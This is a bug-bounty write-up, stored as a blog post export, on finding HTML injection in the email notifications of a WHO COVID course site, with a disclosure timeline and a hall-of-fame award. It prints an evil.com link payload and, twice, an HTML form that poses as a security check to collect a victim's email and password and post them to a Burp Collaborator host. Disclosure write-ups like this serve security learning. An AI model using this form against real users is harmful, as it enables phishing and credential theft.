{"id":335,"date":"2026-03-08T03:55:38","date_gmt":"2026-03-08T03:55:38","guid":{"rendered":"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/08\/%ef%b8%8f%e2%99%82%ef%b8%8fmy-journey-of-securing-who\/"},"modified":"2026-03-08T03:55:38","modified_gmt":"2026-03-08T03:55:38","slug":"%ef%b8%8f%e2%99%82%ef%b8%8fmy-journey-of-securing-who","status":"publish","type":"post","link":"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/08\/%ef%b8%8f%e2%99%82%ef%b8%8fmy-journey-of-securing-who\/","title":{"rendered":"&#xfe0f;&#x200d;&#x2642;&#xfe0f;My Journey of Securing WHO"},"content":{"rendered":"<p>Hello Hackers, Today in this writeup I am going to disclose how I found an HTMLI in email bug in <strong>World Health Organization (WHO) <\/strong>which was found accidently and at the end leads me to achieve HOF recognition.<\/p>\n<figure><img data-opt-id=866455238  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/837\/1*H2-tqhhS5vsW9jCzv05Jew.png\" \/><figcaption>WHO-HOF<\/figcaption><\/figure>\n<p>After seeing people are rewarded HOF from WHO then I am also want to hunt. During my exam days I just try to do basic recons like finding subdomains, using google dorks, shodan dorks, etc to do passive and active\u00a0recon.<\/p>\n<blockquote><p><strong>If you want to learn google dorks, shodan dorks and become god in this then I would recommend to follow my friend &amp; mentor <\/strong><a href=\"https:\/\/medium.com\/u\/9e41d1b8a839\"><strong>AbhirupKonwar<\/strong><\/a><strong> bhaiya. He is next level in dorking. Here I am attaching his list of writeups on this\u00a0topics:<\/strong><\/p><\/blockquote>\n<ul>\n<li><a href=\"https:\/\/medium.com\/@abhirupkonwar04\/list\/advanced-google-dorking-8817a1178836\">List: Advanced Google Dorking | Curated by Abhirup Konwar | Medium<\/a><\/li>\n<li><a href=\"https:\/\/medium.com\/@abhirupkonwar04\/list\/5c6b30d7495b\">Advanced Shodan<\/a><\/li>\n<\/ul>\n<p>So during testing I found interesting subdomain <a href=\"https:\/\/covid.emro.who.int\/\"><strong>covid.emro.who.int<\/strong><\/a><strong>. <\/strong>After visiting and understanding the functionalities I found out nice scenario. Like If the two people are enrolled in the course then they can message each other. This functionality strikes me to hunt for <strong>HTMLI, No Rate Limit, XSS and all that type of\u00a0bugs.<\/strong><\/p>\n<p>Then I quickly created two different accounts and enroll both the victim and attacker to the course and then simply I visit the victim profile as an attacker and click on message button and simply type basic\u00a0payload.<\/p>\n<pre>\"&gt;&lt;a href=https:\/\/evil.com&gt;click&lt;\/a&gt;<\/pre>\n<p>And to my surprise this payload works perfectly and from victim account this payload also executed. Now I think to do XSS or like blind XSS which ultimately gives me cookie of victim account. But sadly none of the payload works\u00a0&#x1f622;. Even simply iframe, marquee all tags not works. Then I am no longer want to test this functionality so I simply closed the victim account on my another(edge) browser. And then I realized that I don\u2019t even test for <strong>form tag <\/strong>then I simply add this payload from attacker\u00a0account.<\/p>\n<pre>Payload:<br \/>&lt;html&gt;<br \/>&lt;body&gt;<br \/>&lt;h4&gt;Dear victim, for security reasons please enter your email and password so we can confirm your account&lt;\/h4&gt;<br \/>&lt;form action=\"https:\/\/burpcollaborator.com\"&gt;&lt;br&gt;<br \/>  &lt;label for=\"username\"&gt;Email: &lt;\/label&gt;<br \/>  &lt;input type=\"text\" id=\"username\" name=\"username\"&gt;&lt;br&gt;<br \/>  &lt;label for=\"password\"&gt;Pass:&lt;\/label&gt;<br \/>  &lt;input type=\"password\" id=\"password\" name=\"password\"&gt;&lt;br&gt;<br \/>  &lt;input type=\"submit\" value=\"submit\"&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/pre>\n<p>Then simply I click on send from attacker account and guess what happened? &#x1f914; You think this will work &#x1f97a; but No no no this also not works because they have put proper sanitization on the website or what ever I don\u2019t really no. It simply remove all the form, input, lable, html, body all tags and simply write other content as it is and it looks like this in the message box and only <strong>H4 tag\u00a0works.<\/strong><\/p>\n<figure><img data-opt-id=831380046  fetchpriority=\"high\" decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/793\/1*h1K0pvhAwcw5XMiToLYNOA.png\" \/><\/figure>\n<p>And I simply leave this things as it is and I am very tired so I just take my phone and scroll youtube shorts for fun. After 2\u20133 minute I got mail in victim account that the attacker sent you message. And I wondered that when testing I didn\u2019t get any mail anytime so I just open the mail and guess what the payload in the form tag was not actually executing in the website and it works perfectly in the email and the email looks like\u00a0this:<\/p>\n<figure><img data-opt-id=1275877488  decoding=\"async\" alt=\"\" src=\"https:\/\/cdn-images-1.medium.com\/max\/854\/1*X05XE2CoDFzcRUKjLNnylA.png\" \/><\/figure>\n<p>At that time I am very happy to see this mail &#x1f929;. Because this is a valid <strong>P4\/P3<\/strong> bug called <strong>HTMLI in email <\/strong>and to show impact of this bug I show them full account takeover thing like how an attacker can achieve ATO via Email HTMLI. You can read following writeup for better understanding.<\/p>\n<p><a href=\"https:\/\/infosecwriteups.com\/cracking-ato-via-email-html-injection-edd19c8e1b8f\">Cracking ATO via Email HTML Injection<\/a><\/p>\n<p>I hope I didn\u2019t messup anything and for your understanding this are the steps to reproduce. Currently this vulnerability was fixed but you can still try your own to bypass this and you can report to WHO and wait for HOF\u00a0&#x1f970;.<\/p>\n<p><strong>Steps to Reproduce:<\/strong><\/p>\n<p><strong>Steps to reproduce:<\/strong><\/p>\n<p>1. visit <a href=\"https:\/\/covid.emro.who.int\/\">https:\/\/covid.emro.who.int\/<\/a><\/p>\n<p>2. now create 2 accounts such as victim and attacker.<\/p>\n<p>3. now enroll in courses in both the accounts.<\/p>\n<p>4. now logout from victim account and now from attacker account message to the victim with the following payload:<\/p>\n<pre>Payload:<br \/>&lt;html&gt;<br \/>&lt;body&gt;<br \/>&lt;h4&gt;Dear victim, for security reasons please enter your email and password so we can confirm your account&lt;\/h4&gt;<br \/>&lt;form action=\"https:\/\/burpcollaborator.com\"&gt;&lt;br&gt;<br \/>  &lt;label for=\"username\"&gt;Email: &lt;\/label&gt;<br \/>  &lt;input type=\"text\" id=\"username\" name=\"username\"&gt;&lt;br&gt;<br \/>  &lt;label for=\"password\"&gt;Pass:&lt;\/label&gt;<br \/>  &lt;input type=\"password\" id=\"password\" name=\"password\"&gt;&lt;br&gt;<br \/>  &lt;input type=\"submit\" value=\"submit\"&gt;<br \/>&lt;\/body&gt;<br \/>&lt;\/html&gt;<\/pre>\n<p>5. now victim get mail from attacker and now victim add his credentials and attacker get victim credentials in burp collaborator.<\/p>\n<blockquote><p><strong>Timeline:<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>18-Oct-24: Reported<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>05-Nov-24: Asked for response till now no response from\u00a0team<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>07-Nov-24: They accpeted\u00a0report<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>21-Nov-24: Ask for update and they told me that vulnerability was not fixed\u00a0yet.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>29-Nov-24: I told them that the vulnerability was fixed with full\u00a0POC.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>02-Dec-24: They denied to accept this and they told me to ask for hof on 31st Jan 2025 after 3 months if they didn\u2019t give me any update in this time\u00a0period.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>15-Jan-25: I again tell them to ask with your dev team because vulnerability was\u00a0fixed.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>16-Jan-25: They confirmed that the bug was fixed and asked details to put in\u00a0HOF.<\/strong><\/p><\/blockquote>\n<blockquote><p><strong>05-Feb-25: Awarded HOF\u00a0&#x1f917;<\/strong><\/p><\/blockquote>\n<p>I know this is very long process. I don\u2019t know why this happened with me. In other case they have good response but in my case it takes 3 moths+ time to finally award hof. But at the end hardwork and time you invest never waste. You will be rewarded as per your hardwork.<\/p>\n<p>Thank you for reading this writeup I will see you in next amazing one. clap if you found it helpful. bye\u00a0&#x1f44b;<\/p>\n<p><img data-opt-id=574357117  decoding=\"async\" src=\"https:\/\/medium.com\/_\/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=85f36c6caf0f\" width=\"1\" height=\"1\" alt=\"\" \/><\/p>\n<hr \/>\n<p><a href=\"https:\/\/osintteam.blog\/%EF%B8%8F-%EF%B8%8Fmy-journey-of-securing-who-85f36c6caf0f\">&#x1f575;&#xfe0f;&#x200d;&#x2642;&#xfe0f;My Journey of Securing WHO &#x1f30f;<\/a> was originally published in <a href=\"https:\/\/osintteam.blog\/\">OSINT Team<\/a> on Medium, where people are continuing the conversation by highlighting and responding to this story.<\/p>","protected":false},"excerpt":{"rendered":"<p>Hello Hackers, Today in this writeup I am going to disclose how I found an HTMLI in email bug in World Health Organization (WHO) which was found accidently and at the end leads me to achieve HOF recognition. WHO-HOF After seeing people are rewarded HOF from WHO then I am also want to hunt. During &#8230; <a title=\"&#xfe0f;&#x200d;&#x2642;&#xfe0f;My Journey of Securing WHO\" class=\"read-more\" href=\"https:\/\/quantusintel.group\/osint\/blog\/2026\/03\/08\/%ef%b8%8f%e2%99%82%ef%b8%8fmy-journey-of-securing-who\/\" aria-label=\"Read more about &#xfe0f;&#x200d;&#x2642;&#xfe0f;My Journey of Securing WHO\">Read more<\/a><\/p>\n","protected":false},"author":1,"featured_media":336,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-335","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/comments?post=335"}],"version-history":[{"count":0,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/posts\/335\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media\/336"}],"wp:attachment":[{"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/media?parent=335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/categories?post=335"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/quantusintel.group\/osint\/wp-json\/wp\/v2\/tags?post=335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}